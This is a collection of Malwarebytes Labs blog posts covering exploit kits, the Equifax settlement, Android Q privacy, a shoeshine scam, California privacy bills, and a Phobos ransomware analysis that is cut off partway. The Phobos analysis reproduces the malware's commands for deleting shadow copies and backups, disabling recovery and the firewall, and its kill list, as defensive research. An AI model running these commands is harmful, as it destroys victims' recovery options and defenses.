Payloads seen: AZORult, Osiris, Maze ransomware

Magnitude EK

Magnitude EK continues to target South Korea with its own Magniber ransomware in steady malvertising campaigns.

Payload seen: Magniber ransomware

RIG EK

RIG EK is still kicking around via various malvertising chains and perhaps offers the most diversity in terms of the malware payloads it serves.

Payloads seen: ERIS, AZORult, Phorpiex, Predator, Amadey, Pitou

GrandSoft EK

GrandSoft EK remains the weakest exploit kit of the bunch and continues to drop Ramnit in Japan.

Payload seen: Ramnit

Underminer EK

Underminer EK is a rather complex exploit kit delivering an equally complex payload, which we continue to observe via the same delivery chain.

Payload seen: Hidden Bee

GreenFlash Sundown EK

The elusive GreenFlash Sundown EK marked a surprise return via its ShadowGate in a large malvertising campaign in late June.

Payloads seen: Seon ransomware, Pony, coin miner


A few other drive-bys were caught during the past few months, although it might be a stretch to call them exploit kits.

  • azera drive-by used the PoC for CVE-2018-15982 (Flash) to drop the ERIS ransomware
  • Radio EK leveraged CVE-2016-0189 (Internet Explorer) to drop AZORult

Three years since Angler EK left

June 2016 is an important date for the web threat landscape, as it marks the fall of Angler EK, perhaps one of the most successful and sophisticated exploit kits. Since then, exploit kits have never regained their place as the top malware delivery vector.

However, since our spring review, there have been some notable events and interesting campaigns. While it's hard to believe that users are still running machines with outdated Internet Explorer and Flash Player versions, this renewed activity proves that they are.

Although we have not mentioned router-based exploit kits in this edition, they are still a valid threat that we expect to grow in the coming months. Also, if exploit kit developers start branching out beyond Internet Explorer, we could see far more serious attacks.

Malwarebytes users are protected against the aforementioned drive-by download attacks thanks to our products’ anti-exploit layer of technology.

Indicators of Compromise (URI patterns)

Spelevo EK


Fallout EK


Magnitude EK




GrandSoft EK


Underminer EK


GreenFlash Sundown EK


The post Exploit kits: summer 2019 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to get your Equifax money and stay safe doing it

Malwarebytes - Tue, 07/30/2019 - 15:00

Following the enormous data breach of Equifax in 2017—in which roughly 147 million Americans suffered the loss of their Social Security numbers, addresses, credit card and driver's license information, birthdates, and more—the company has agreed to a settlement with the US Federal Trade Commission, in which it will pay at least $650 million.

Much of that settlement—up to $425 million—is reserved for you, the consumers. Here’s how you can see if you’re eligible for a payment.

First, you can check if your sensitive data was compromised during the 2017 data breach by going to Equifax’s new settlement website:

It’s important to quickly note here that this website, which does not look like Equifax’s regular website, is a reported improvement from the last time Equifax tried to set up its own response, which, in the immediate aftermath of the 2017 breach, was described as “completely broken at best, and little more than a stalling tactic or sham at worst.”

Back to that settlement money: By inputting your last name and the last six digits of your Social Security Number (which is too many numbers, we should say), you can find out if you’re eligible for a claim of, at the very least, either 10 years of free credit monitoring or $125 paid through either a check or a pre-paid card.

You can file a claim at Equifax’s web portal here:

Depending on how the 2017 data breach affected you, you may be eligible for more payments.

For example, if you spent time trying to recover from identity theft or fraud that stemmed from Equifax’s data breach, you can be paid $25 per hour for each hour you spent on that work. That work includes placing and removing credit freezes and purchasing credit monitoring services.

Further, if you actually lost money from identity theft or fraud caused by the breach, you can make a claim to be reimbursed for up to $20,000. Documented evidence must be provided.

Beware the scams

Another corporate data breach settlement with the US government means another moment for heightened cybersecurity vigilance.

Equifax’s extremely broad settlement is, if you’ll pardon our stretched metaphor, akin to a dead whale in the open ocean: Sharks are coming.

As with any major news in America, especially news that affects more than 100 million people, the opportunity for cybercriminal attack is high. For example, after the European Union’s General Data Protection Regulation (GDPR) came into effect, countless company emails flooded Americans’ inboxes. Cybercriminals were not far behind, and they sent their own phishing emails that masqueraded as legitimate notices.

The same could happen with the Equifax settlement.

Remember, there is only one website right now to check if you’re eligible for a claim, and it’s the one we’ve listed above.

With the breach once again in everyone’s minds, it’s also a good time to remember how to protect yourself from identity theft. Revisit our blog from 2017 that covers various safety precautions, including obtaining credit monitoring, refusing to reply to texts and calls from unknown phone numbers, and stepping up your password protocol (don’t repeat passwords, make them complex). And for even more in-depth information on identity theft, take a look at this comprehensive article in our cybersecurity basics hub.

Stay safe, everyone.

The post How to get your Equifax money and stay safe doing it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Dark Android Q rises

Malwarebytes - Mon, 07/29/2019 - 17:55

Android Q, the upcoming 10th major release of the Android mobile operating system, was developed by Google with three major themes in mind: innovation, security, and privacy. Today, we are going to focus mostly on security and privacy, although there are still many potential changes and updates on the horizon that can be discussed.


Privacy has been a top priority in developing Android Q, as it's important today to give users control of, and transparency into, how their information is collected and used by apps and by their phones. Android Q makes significant changes across the platform to improve privacy, and we are going to inspect them one by one.

Note: Developers will need to review new privacy features and test their apps. Impacts can vary based on each app’s core functionality, targeting, and other factors. 

Picture 1: Device location

Let’s start with location. Apps can still ask the user for permission to access location, but now in Android Q, the user sees a larger screen with more choices on when to allow access to location, as shown in Picture 1. Users will be able to give apps access to location data all the time or only when the app is in focus (in use and in the foreground).

This additional control became possible because Android Q introduces a new location permission, ACCESS_BACKGROUND_LOCATION, which allows an app to access location in the background.

A detailed guide is available on how to adapt your app for the new location controls. 

Scoped storage

Outside of location, a new feature called “scoped storage” was introduced to give users more security and reduce app clutter. Android Q will still use the READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE permissions, but now apps targeting Android Q by default are given a filtered view into external storage.

Such apps can only see their own directory and specific types of media, and thus need no permission to read or write files there. This also lets developers keep a private space on your device's storage without asking for any specific permissions.

Note: There is a guide that describes how files are included in the filtered view, as well as how to update your app so that it can continue to share, access, and modify files that are saved on an external storage device.

From the security standpoint, this is a beneficial update. It stops malicious apps that depend on you granting access to sensitive data because you did not read what you saw in the dialog and just clicked “yes.”

Background restrictions

Another important change is that Android Q restricts apps from launching activities from the background without user interaction. This behavior helps reduce interruptions and keeps users more in control of what's shown on their screens.

This new change takes effect for all apps running on Android Q. Even if your app targets API level 28 or lower and was originally installed on a device running Android 9, the restrictions will apply once the device is upgraded to Android Q.

Note: Apps running on Android Q can start activities only when one or more of the following conditions are met.

Data and identifiers

To prevent tracking, starting in Android Q, Google will require app developers to request a special privileged permission (READ_PRIVILEGED_PHONE_STATE) before they can access the device’s non-resettable identifiers, both IMEI and the serial number.

Note: Read the best practices to choose the right identifiers for your specific case, as many don’t need non-resettable device identifiers (for analytics purposes, for example).

Also, Android Q devices will now transmit a randomized MAC address by default. Although Google introduced MAC address randomization in Android 6.0, devices could only broadcast a random MAC address if the smartphone initiated a background Wi-Fi or Bluetooth scan. It’s worth mentioning, however, that security researchers proved they can still track devices with randomized MAC addresses.

Wireless network restrictions

Another new feature in Android Q is that apps cannot enable or disable Wi-Fi. The WifiManager.setWifiEnabled() method always returns false.

With Android Q, users are now prompted to enable or disable Wi-Fi via the Settings Panel, an API that allows apps to show settings to users in the context of their app.

What’s more, to protect user privacy, manual configuration of the list of Wi-Fi networks is now restricted to system apps and device policy controllers (DPCs). A given DPC can be either the device owner or the profile owner.


Android Q changed the scope of the READ_FRAME_BUFFER, CAPTURE_VIDEO_OUTPUT, and CAPTURE_SECURE_VIDEO_OUTPUT permissions. They are now signature-access only, which prevents silent access to the device's screen content.

Picture 2

Apps that need access to the device’s screen content will use the MediaProjection API. If your app targets Android 5.1 (API level 22) or lower, users will see a permissions screen when running your app on Android Q for the first time, as shown in Picture 2. This gives users the opportunity to cancel/change access to permissions that the system previously granted to the app while installing.

In addition, Android Q introduces a new ACTIVITY_RECOGNITION permission for apps that need to detect the user's step count or classify the user's physical activity. This is done so that users can see in Settings how device sensor data is used.

Note: If your app relies on data from other built-in sensors on the device, such as the accelerometer and gyroscope, you don’t need to declare this new permission in your app.


Android Pie introduced the BiometricPrompt API to help apps utilize biometrics, including face, fingerprint, and iris. To keep users secure, the API was expanded in Android Q to support additional use cases, including both implicit and explicit authentication.

If we are talking about explicit authentication, users must perform an action to proceed. That can be a tap to the fingerprint sensor or, if it’s face or iris authentication, then the user must click an additional button to proceed. All high-value payments have to be done via explicit flow, for example.

Implicit flow does not require an additional user action. It is most often used for sign-in and autofill, where there is no need for a complex action on simple, low-risk transactions that can be easily reversed.

Another handy new feature in BiometricPrompt is the ability to check whether a device supports biometric authentication prior to invoking BiometricPrompt. This is useful when an app wants to show an "enable biometric sign-in" or similar item on its sign-in page or in-app settings menu.

One more interesting change made in Android Q is support for TLS 1.3. Google claims secure connections can be established as much as 40 percent faster with TLS 1.3 than with TLS 1.2. From a security perspective, TLS 1.3 is cleaner, less error prone, and more reliable. And from a privacy perspective, TLS 1.3 encrypts more of the handshake to better protect the identities of the participating parties.

The last feature we wanted to point out is Adiantum, a form of storage encryption that protects your data if your phone falls into someone else's hands. Adiantum is an innovation in cryptography designed to make storage encryption efficient on devices without hardware cryptographic acceleration, ensuring that all devices can be encrypted.

In Android Q, Adiantum will be part of the Android platform, and Google intends to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Beta 5 and beyond

Android Q Beta 1 was launched on March 13, and Beta 5 is already available to download. If you would like to try the beta, check whether your device is on the supported list and download it.

The Android 10 Q release date timeline

There is still one more beta before the final build drops sometime before Q3 is over, according to the release timeline. Developers should dive into Android Q now and start learning about the new features and APIs they can use in their apps.

And perhaps the most important question of all—what will Android Q be named? The list of desserts starting with Q is rather small, and some suggestions have already come up among users online:

What would you call it? And do you think these changes will better protect user privacy and security? Sound off in the comments.

The post Mobile Menace Monday: Dark Android Q rises appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 22 – 28)

Malwarebytes - Mon, 07/29/2019 - 15:50

Last week on Malwarebytes Labs, we offered an extensive analysis into the Malaysian Airlines Flight 17 investigation, updated users on the newest feature set to AdwCleaner 7.4.0 (it now detects pre-installed software), and provided a deep dive into Phobos ransomware. We also broke down the latest privacy cautions regarding the popular app, FaceApp.

In addition, we looked at an interesting real-life shoe-shining scam that was noticed online, and gave a comprehensive breakdown between stalkerware and parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (July 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Good Twitter Samaritans accidentally prevent shoeshine scam

Malwarebytes - Fri, 07/26/2019 - 16:45

A few days ago, Indian news portals were buzzing with tales of a well-worn shoeshine scam making its way into social media. It’s a great example of how good-natured gestures can unwittingly aid scammers when high-visibility accounts are combined with a potential lack of fact-checking. Thankfully, it comes with a happy ending for a change.

What happened?

A Twitter user dragged this offline scam into the digital realm by mentioning that they’d run into an individual claiming to be a shoeshine boy. The scam goes as follows: They gently insist on shining your shoes, they refuse any money offered unrelated to said shoe shining (“I’m not begging”), and then they get to work.

While shining the shoes, eventually they mention that their life would change if they could get a shoeshine box. As the discussion continues, they pick the right moment to shift gears, and before you know it, they’re telling you to take them to a specific shop a small journey away, and the confused person with the sparkling shoes is handing over about US$25.

The scam here is that once the victim has gone, the scammer goes back to the shop and gives half the money back. It’s a smart piece of social engineering on the part of the scammer. Aside from anything else, “Please come with me to this random location 15 minutes away” isn’t a safe thing to do at the best of times.

What happened after this hit social media?

Glad you asked. This rather old scam may have played out the same way it always has, except the Twitter user mentioned above caught the attention of some big follower accounts. Hoping to assist the suspect shoeshine boy in their quest to get a shoeshine box, actress Parineeti Chopra went a little further and started mentioning the possibility of job offers. Given her account currently has 13.2 million followers, that’s a massive chunk of syndication for a fakeout.

As we’ve seen many times in the past, this could’ve just as easily been a malware scam, or a phish, or some other awful wheeze at the victim’s expense. When you’re blasting out content to that many people, one hopes it’d be checked beforehand. Alas, it was not. Would the person contacted by the scammer fall for it? Or would things take a different turn?

To the rescue

Weirdly, it took the multi-million follower actress tweeting out a “help this person” comment for other people to point out that it was a fake [1], [2]. If she hadn’t, the person who first mentioned it might have been parted from their cash.

You can see video of an actual encounter with someone who (it is claimed) is the same individual from the most recent anecdote. Essentially, if you’re in India and you’re approached for a shoeshine: fine. If there’s a sudden mention of shoeshine boxes and immediate trips to another location: politely decline and be on your way.

Summer is here…and so are the scams

This is an interesting case where unintentionally amplifying a scam actually helped to bring it down. You see that happen a fair bit in tech-centric realms, especially with so many scam hunters online and lurking on social media. However, this isn’t quite so common with real-world scams and certainly doesn’t typically play out in real time.

So-called fake news and other forms of misinformation can be incredibly damaging, and it doesn’t have to be at the international level. More commonplace scams targeting regular web users can be just as harmful on an individual level. Given summer is indeed upon us, it’s a good reminder to try and steer clear of scams whether online, offline, or a mixture of both.

The post Good Twitter Samaritans accidentally prevent shoeshine scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Changing California’s privacy law: A snapshot at the support and opposition

Malwarebytes - Thu, 07/25/2019 - 15:59

This month, the corporate-backed legislative battle against California privacy met a blockade, as one Senate committee voted down and negotiated changes to several bills that, as originally written, could have weakened the state’s data privacy law, the California Consumer Privacy Act.

Though the bills’ authors have raked in thousands of dollars in campaign contributions from companies including Facebook, AT&T, and Google, records portray broader donor networks, which include Political Action Committees (PACs) for real estate, engineering, carpentry, construction, electrical, and municipal workers.

Instead, Big Tech relied on advocacy and lobbying groups to help push favorable legislative measures forward. For example, one bill that aimed to lower restrictions if companies provide consumer data to government agencies was supported by TechNet and Internet Association.

Those two groups alone represent the interests of Amazon—which was caught offering a corporate job to a Pentagon official involved in a $10 billion Department of Defense contract that the company is currently seeking—and Microsoft—another competitor in the same $10 billion contract—along with Google, Twitter, Lyft, Uber, PayPal, Accenture, and Airbnb.

Below is a snapshot of five CCPA-focused bills that were all scheduled for a vote during a July 9 hearing by the California Senate Judiciary Committee. The committee chair, Senator Hannah-Beth Jackson, pulled a 12-hour-plus shift that day, trying to clear through more than 40 bills.

Yet another day in politics.

We hope to provide readers with a look at both the support and opposition to these bills, along with a view of who wrote the bills and what groups have donated to their authors. It is important to remember that lawmaking is rarely a straight line, and a campaign contribution is far from an endorsement.

The assembly bills AB 1416
  • What’s it all about? Exceptions to the CCPA when companies provide consumer data to government agencies
  • Author: Assemblymember Ken Cooley
  • Author’s top 2018 donors: the California Democratic Party ($111,192), the State Building and Construction Trades Council of California PAC Small Contributor Committee ($17,600), the California State Council of Laborers PAC ($17,600).
  • Author’s tech donors: AT&T ($8,800), Facebook ($6,900)
  • Supported by: Internet Association, Technet, Tesla, Symantec, California Land Title Association, California Alliance of Caregivers, among others
  • Opposed by: ACLU of California, Electronic Frontier Foundation, Common Sense Kids Action, and Privacy Rights Clearinghouse

AB 1416 would have created a new exception to the CCPA for any business that “provides a consumer’s personal information to a government agency solely for the purposes of carrying out a government program, if specified requirements are met.”

The bill would have granted companies the option to ignore a consumer’s decision to opt out of having their data sold to another party, so long as the sale of that consumer’s data was “for the sole purpose of detecting security incidents, protecting against malicious, deceptive, fraudulent, or illegal activity, and prosecuting those responsible for that activity.”

According to multiple privacy groups, those exceptions were too broad. In a letter signed by ACLU of California, EFF, Common Sense Kids Action, and Privacy Rights Clearinghouse, the groups wrote:

“Given the breadth of these categories, especially with the increasing use of machine learning and other data-driven algorithms, there is no practical limit on the kinds of data that might be sold for these purposes. It would even allow sales based on the purchaser’s asserted purpose, increasing the potential for abuse, much like the disclosure of millions of Facebook user records by Cambridge Analytica.”

These challenges were never tested with a vote, though, as Asm. Cooley pulled the bill before the committee hearing ended.

AB 873
  • What’s it all about? Changing CCPA’s definition of “deidentified” information
  • Author: Assemblymember Jacqui Irwin
  • Author’s top 2018 donors: California Democratic Party ($105,143), the State Building and Construction Trades Council of California PAC ($17,600), the Professional Engineers in California Government PECG-PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), AT&T ($8,200), Hewlett Packard ($3,700)
  • Supported by: California Chamber of Commerce (sponsor), Internet Association, Technet, Advanced Medical Technology Association, California News Publishers Association, among others
  • Opposed by: ACLU of California, EFF, Campaign for a Commercial-Free Childhood, Access Humboldt, Oakland Privacy, Consumer Reports, among others

AB 873 would have narrowed the scope for what CCPA protects—“personal information”—by broadening the definition of something that CCPA currently does not protect—“deidentified” information.

According to the bill, the definition of “deidentified” information would now include “information that does not identify, and is not reasonably linkable, directly or indirectly, to a particular consumer.”

Privacy advocates claimed the bill had too broad a reach. In a letter, several opponents wrote that AB 873 “would allow businesses to track, profile, recognize, target, and manipulate consumers as they encountered them in both online and offline settings while entirely exempting those practices from the scope of the CCPA, as long as the information used to do so was not tied to a person’s ‘real name,’ ‘SSN’ or similar traditional identifiers.”

During the Senate committee hearing, Asm. Irwin defended her bill by saying that CCPA’s current definition of deidentified information was “unworkable.” She then rebuffed suggestions by the committee chair to add amendments to her bill.

The bill failed to pass on the committee’s 3–3 vote.

AB 25
  • What’s it all about? Exceptions to CCPA for employers that collect data from their employees and job applicants
  • Author: Assemblymember Ed Chau
  • Author’s top 2018 donors: California State Council of Service Employees ($17,600), the California State Council of Laborers ($13,200) the California State Pipe Trades Council ($10,000).
  • Author’s tech donors: Facebook ($4,400), AT&T ($3,900), Hewlett Packard ($3,200), Google ($2,500), Intuit ($2,000)
  • Supported by: Internet Association, Technet, California Chamber of Commerce, National Payroll Reporting Consortium, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, among others

AB 25, as originally written, would have removed CCPA protections for some types of data that employers collect both on their employees and their job applicants.

Hayley Tsukayama, legislative analyst for EFF, said that a concern she and other privacy advocates had with the bill was that employers are beginning to collect more information on their employees that more often resemble consumer-type data.

“We are seeing a lot more of these workplace surveillance programs pop up,” Tsukayama said over the phone, giving a hypothetical example of a fitness tracker for employees where the data could be shared with health insurance companies. “The ways that this collection is being introduced into the workplace, it’s not necessary for the employer-employee relationship, and it is more in the vein of consumer data.”

After Chau agreed to add amendments to his bill, the Senate committee passed it. The bill, if it becomes law, will sunset in one year, giving legislators and labor groups another opportunity to review its impact in a short time.

AB 846
  • What’s it all about? Customer loyalty programs
  • Author: Assemblymember Autumn Burke
  • Author’s top 2018 donors: State Building and Construction Trades Council of California PAC ($17,600), SEIU California State Council Small Contributor Committee ($17,600), IBEW Local 18 Water & Power Defense League ($17,600), California State Council of Laborers PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), Technet California Political Action Committee ($8,449), Charter Communications ($7,900), AT&T and its affiliates ($7,300)
  • Supported by: California Chamber of Commerce, California Grocers Association, California Hotel & Lodging Association, California Restaurant Association, Ralphs Grocery Company, Wine Institute, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Common Sense Kids Action, Privacy Rights Clearinghouse, Access Humboldt

AB 846 targets CCPA’s current non-discrimination clause that prohibits companies from offering incentives—like lowered prices—to customers based on their data practices.

The bill would clarify that CCPA’s regulations are not violated when businesses offer “a different price, rate, level, or quality of goods or services to a consumer if the offering is in connection with a consumer’s voluntary participation in a loyalty, rewards, premium features, discount, or club card program.”

The bill received so many changes, though, that some groups were puzzled over what it allows.

“There was a point at which [AB 846] said any service that has a functionality directly related to the collection of, and use, of personal information was exempt,” Tsukayama said. “We spent a lot of time going ‘Well, what does that mean?’ We never got a satisfactory answer.”

She continued: “We were concerned that this would cover a lot of ad tech, or invasive company programs, to collect more data.”

With additional amendments to be added, the Senate committee passed the bill.

AB 1564
  • What’s it all about? Whether businesses have to provide a phone number for consumer data requests
  • Author: Assemblymember Marc Berman
  • Author’s top 2018 donors: California State Council of Service Employees ($26,100), Northern California Carpenters Regional Council SCC ($17,600), American Federation of State, County & Municipal Employees – CA People SCC ($17,600)
  • Author’s tech donors: Facebook ($8,800), TechNet PAC ($6,526)
  • Supported by: Internet Association (sponsor), Engine, Coalition of Small & Disabled Veteran Businesses, Small Business California, National Federation of Independent Businesses (CA), among others
  • Opposed by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, Access Humboldt, Privacy Rights Clearinghouse, among others  

CCPA allows Californians to contact the companies that collect their data and make requests about that data, including accessing it, changing it, and deleting it. The law states that companies must provide at least two methods of contact, including one toll-free telephone number, for those requests.

AB 1564 would allow online-only businesses to provide their direct consumers with just one method of contact—an email address—for data requests.

Privacy advocates previously warned that the bill could make it harder for those with limited Internet access to assert their privacy rights.

The bill, which will be amended, passed the Senate committee.

What comes next?

The California Senate is currently in a summer recess, scheduled to return August 12. The bills that passed the Senate Judiciary Committee—ABs 25, 846, and 1564, regarding employee data, loyalty programs, and email address contacts—will next be heard by the Senate Appropriations Committee, a separate committee of lawmakers who oversee and move forward bills that have a fiscal component.

That committee has until August 30 to move bills to the floor.

Afterwards, either chamber of the state has until September 13 to send a bill to Governor Gavin Newsom’s desk for signature.

The post Changing California’s privacy law: A snapshot at the support and opposition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A deep dive into Phobos ransomware

Malwarebytes - Wed, 07/24/2019 - 18:09

Phobos ransomware appeared at the beginning of 2019. It has been noted that this new strain is strongly based on a previously known family, Dharma (a.k.a. CrySis), and is probably distributed by the same group.

While attribution is by no means conclusive, you can read more about potential links between Phobos and Dharma here, including an intriguing connection with the XDedic marketplace.

Phobos is one of the ransomware families distributed via hacked Remote Desktop Protocol (RDP) connections. This isn’t surprising: hacked RDP servers are a cheap commodity on the underground market and make an attractive, cost-efficient dissemination vector for threat groups.

In this post we will take a look at the implementation of the mechanisms used in Phobos ransomware, as well as its internal similarities to Dharma.

Analyzed sample


Behavioral analysis

This ransomware does not deploy any UAC bypass techniques. When we try to run it manually, the UAC confirmation pops up:

If we accept it, the main process deploys another copy of itself with elevated privileges. It also executes several commands via the Windows shell.

Two types of ransom notes are dropped: .txt and .hta. After the encryption process finishes, the .hta ransom note pops up:

Ransom note in the .hta version

Ransom note in the .txt version

Even after the initial ransom note pops up, the malware keeps running in the background, encrypting newly created files.

All local disks, as well as network shares, are attacked.

It also uses several persistence mechanisms: it installs itself in %APPDATA% and in the Startup folder, and adds registry keys to autostart its process when the system is restarted.

A view from Sysinternals’ Autoruns

These mechanisms make Phobos ransomware very aggressive: the infection doesn’t end with a single run, but can be repeated multiple times. To prevent repeated infection, all persistence mechanisms should be removed as soon as the attack is noticed.

The Encryption Process

The ransomware is able to encrypt files without an internet connection (at this point we can guess that it comes with some hardcoded public key). Each file is encrypted with an individual key or initialization vector: the same plaintext generates different ciphertext in each file.

It encrypts a variety of files, including executables. Encrypted files have the attacker’s email address added to their names. This particular variant of Phobos adds the extension ‘.acute’; however, different extensions have been encountered in different variants. The general pattern is: <original name>.id[<victim ID>-<version ID>][<attacker's e-mail>].<added extension>

Visualizing the encrypted content reveals no recognizable patterns, suggesting that either a stream cipher or a cipher with chained blocks was used (possibly AES in CBC mode). Example: a simple BMP before and after encryption:

When we look inside an encrypted file, we can see a particular block at the end, separated from the encrypted content by a padding of ‘0’ bytes. The first 16 bytes of this block are unique per file (a possible initialization vector). Then comes a 128-byte block that is the same in every file from the same infection, which likely means this block contains the encrypted key, uniquely generated on each run. At the end we find a six-character keyword typical for this ransomware. In this case it is ‘LOCK96’; however, different versions of Phobos have been observed with different keywords, e.g., ‘DAT260’.
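The trailer layout described above can be sketched as a small parser. This is a simplified model based only on the observations stated here (16-byte IV, 128-byte encrypted-key block, six-byte marker); the real format also carries an encrypted metadata block with checksums and the original file name:

```python
# Sketch of parsing the trailer of a Phobos-encrypted file, based on the
# layout described in the analysis. Offsets are simplified.
MARKER_LEN = 6        # e.g., b"LOCK96"
RSA_BLOCK_LEN = 128   # the AES key, encrypted with the attacker's RSA key
IV_LEN = 16           # per-file random initialization vector

def parse_trailer(data: bytes):
    marker = data[-MARKER_LEN:]
    enc_key = data[-(MARKER_LEN + RSA_BLOCK_LEN):-MARKER_LEN]
    iv = data[-(MARKER_LEN + RSA_BLOCK_LEN + IV_LEN):-(MARKER_LEN + RSA_BLOCK_LEN)]
    return iv, enc_key, marker

# A fabricated file tail just to demonstrate the slicing:
blob = b"\xAA" * 100 + b"\x00" * 8 + b"I" * 16 + b"K" * 128 + b"LOCK96"
iv, enc_key, marker = parse_trailer(blob)
print(marker)  # b'LOCK96'
```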

In order to fully understand the encryption process, we will look inside the code.


In contrast to most malware, which comes protected by a crypter, Phobos is not packed or obfuscated. Although a lack of packing is uncommon in the general population of malware, it is common among malware distributed manually by attackers.

The execution starts in WinMain function:

During execution, Phobos starts several threads responsible for its different actions: killing blacklisted processes, executing commands via the command line, and encrypting accessible drives and network shares.

Used obfuscation

The code of the ransomware is not packed or obfuscated. However, some constants, including strings, are protected by AES and decrypted on demand. A particular string can be requested by its index, for example:

The AES key used for this purpose is hardcoded (in obfuscated form), and imported each time a chunk of data needs to be decrypted.

Decrypted content of the AES key

The Initialization Vector is set to 16 NULL bytes.
The code responsible for loading the AES key is given below. The function wraps the key into a BLOBHEADER structure, which is then imported.

From the BLOBHEADER structure we can read the following information: 0x8 = PLAINTEXTKEYBLOB, 0x2 = CUR_BLOB_VERSION, 0x6610 = CALG_AES_256.
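In Python terms, the blob handed to CryptImportKey can be modeled like this; the constants are those read from the BLOBHEADER above, and the layout (header, key length, raw key bytes) follows the standard PLAINTEXTKEYBLOB format for symmetric keys:

```python
import struct
import secrets

# Constants matching the values read from the binary's BLOBHEADER.
PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 0x2
CALG_AES_256 = 0x6610

def make_plaintext_key_blob(key: bytes) -> bytes:
    # BLOBHEADER: bType (BYTE), bVersion (BYTE), reserved (WORD), aiKeyAlg (DWORD)
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_256)
    # Followed by the key length (DWORD) and the raw key material.
    return header + struct.pack("<I", len(key)) + key

blob = make_plaintext_key_blob(secrets.token_bytes(32))
print(len(blob))  # 8-byte header + 4-byte length + 32-byte key = 44
```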

Example of a decrypted string:

Among the decrypted strings we can also see the list of attacked extensions.

We can also find a list of some keywords:

acute actin Acton actor Acuff Acuna acute adage Adair Adame banhu banjo Banks Banta Barak Caleb Cales Caley calix Calle Calum Calvo deuce Dever devil Devoe Devon Devos dewar eight eject eking Elbie elbow elder phobos help blend bqux com mamba KARLOS DDoS phoenix PLUT karma bbc CAPITAL

This is a list of possible extensions used by this ransomware family, (probably) used to recognize and skip files that have already been encrypted by a ransomware of this family. The extension used in the current encryption round is hardcoded.

One of the encrypted strings specifies the template for the file extension, which is later filled with the victim ID:

UNICODE ".id[<unique ID>-1096].[].acute"
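Filled in, the template expands as in this sketch; the victim ID, email address, and extension below are illustrative placeholders, not values from the analyzed sample:

```python
# Hypothetical helper expanding the hardcoded name template into the full
# name of an encrypted file, following the general pattern described above.
def encrypted_name(original, victim_id, version_id, email, ext):
    return f"{original}.id[{victim_id}-{version_id}].[{email}].{ext}"

print(encrypted_name("report.docx", "1E857D00", 1096,
                     "attacker@example.com", "acute"))
# report.docx.id[1E857D00-1096].[attacker@example.com].acute
```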

Killing processes

The ransomware comes with a list of processes that it kills before the encryption is deployed. Just like other strings, the full list is decrypted on demand:

msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe
oracle.exe ocssd.exe dbsnmp.exe synctime.exe agntsvc.exe
mydesktopqos.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe
ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe
firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe
mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe
msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe steam.exe
thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe

These processes are killed so they do not lock the files that are about to be encrypted.
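The matching step can be sketched as a simple filter; process enumeration and termination via the Windows API are omitted, and the list is abbreviated to a few entries:

```python
# Sketch of the process-killing logic: compare each running process name
# against the decrypted blacklist and report matches to be terminated.
KILL_LIST = {"sqlservr.exe", "mysqld.exe", "outlook.exe", "winword.exe"}

def processes_to_kill(running):
    # Case-insensitive match against the blacklist.
    return [name for name in running if name.lower() in KILL_LIST]

print(processes_to_kill(["explorer.exe", "WINWORD.EXE", "mysqld.exe"]))
# ['WINWORD.EXE', 'mysqld.exe']
```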

A fragment of the function enumerating and killing processes

Deployed commands

The ransomware executes several commands via the command line. These commands are meant to prevent the victim from recovering encrypted files from backups.

Deleting the shadow copies:

vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Changing bcdedit options (preventing the system from booting into recovery mode):

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

Deleting the backup catalog on the local computer:

wbadmin delete catalog -quiet

It also disables the firewall:

netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable
exit

Attacked targets

Before Phobos starts its malicious actions, it checks the system locale (using GetLocaleInfoW with the options LOCALE_SYSTEM_DEFAULT and LOCALE_FONTSIGNATURE). The 9th bit of the output represents Cyrillic alphabets; if it is set, execution terminates, so systems with a Cyrillic default locale are not attacked.
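The check can be sketched in pure Python; bit 9 of the first fsUsb DWORD in the FONTSIGNATURE returned by GetLocaleInfoW corresponds to the Cyrillic Unicode subrange:

```python
# Sketch of the locale check: if the Cyrillic bit is set for the default
# system locale, Phobos bails out before doing any damage.
CYRILLIC_BIT = 1 << 9   # 0x200, bit 9 of the first fsUsb DWORD

def should_terminate(fs_usb0: int) -> bool:
    return bool(fs_usb0 & CYRILLIC_BIT)

print(should_terminate(0x0000020F))  # True  -> Cyrillic locale, skip host
print(should_terminate(0x0000000F))  # False -> proceed to encrypt
```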

Both local drives and network shares are encrypted.

Before the encryption starts, Phobos lists all files and compares their names against hardcoded lists. These lists are stored inside the binary in AES-encrypted form, with strings separated by the delimiter ‘;’.

Fragment of the function decrypting and parsing the hardcoded lists

Among those lists we can find, for example, a blacklist of files to be skipped. These are mostly operating system files, plus info.txt and info.hta, the names of the Phobos ransom notes:


There is also a list of directories to be skipped – in the analyzed case it contains only one directory: C:\Windows.

Also skipped are files with the extensions used by Phobos variants, mentioned earlier.

There is also a pretty long whitelist of extensions:

